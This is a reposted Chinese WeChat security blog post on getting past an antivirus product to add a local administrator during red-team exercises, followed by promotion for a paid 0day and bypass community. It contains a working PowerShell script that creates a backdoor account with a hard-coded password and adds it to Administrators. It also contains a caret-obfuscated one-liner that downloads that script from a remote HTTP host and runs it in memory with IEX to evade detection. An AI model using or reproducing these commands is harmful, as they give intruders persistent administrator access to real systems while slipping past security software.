视觉福利
每次红蓝对抗时,对全家桶查杀甚是苦扰。
添加用户时,每次都是被查杀。
这里采用了远程加载的方式,进行绕过。
利用了一点powershell的绕过方式。
复制上传到服务器上,后缀名为ps1
$nt=[adsi]"WinNT://localhost"
$user=$nt.create("user","ceshi")
$user.setpassword("abc123456")
$user.setinfo()
Get-WmiObject -Class Win32_UserAccount -Filter "name = 'ceshi'" | Set-WmiInstance -Argument @{PasswordExpires = 0}
$group=[ADSI]"WinNT://localhost/administrators,group"
$group.add("WinNT://$env:USERDOMAIN/ceshi,user")
绕过某数字远程加载ps脚本添加ceshi到管理员组
echo I^E^X (New-Object Net.W^e^b^C^l^i^e^n^t).D^o^w^n^l^o^a^d^S^t^r^i^n^g('http://10.0.100.14:80/download/user.ps1'); |p^o^w^e^r^s^h^e^l^l -
走过,路过。不要错过。点个关注再走呗。
长按识别二维码,关注极梦C公众号哦~~
推荐一个干货星球。
只做:
实战
Bypass
0day
人人可用
事事可做
!!!惊喜福利:
1.进入知识星球免费领永久fofa会员
2.完整漏洞库资源整合,包含(qingy,peiqi等漏洞库) ×1
3.加入星球,发布5篇技术分析实战原创文章(不能灌水抄袭),送0day。
原文始发于微信公众号(极梦C):绕过某数字远程加载添加本地管理员
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论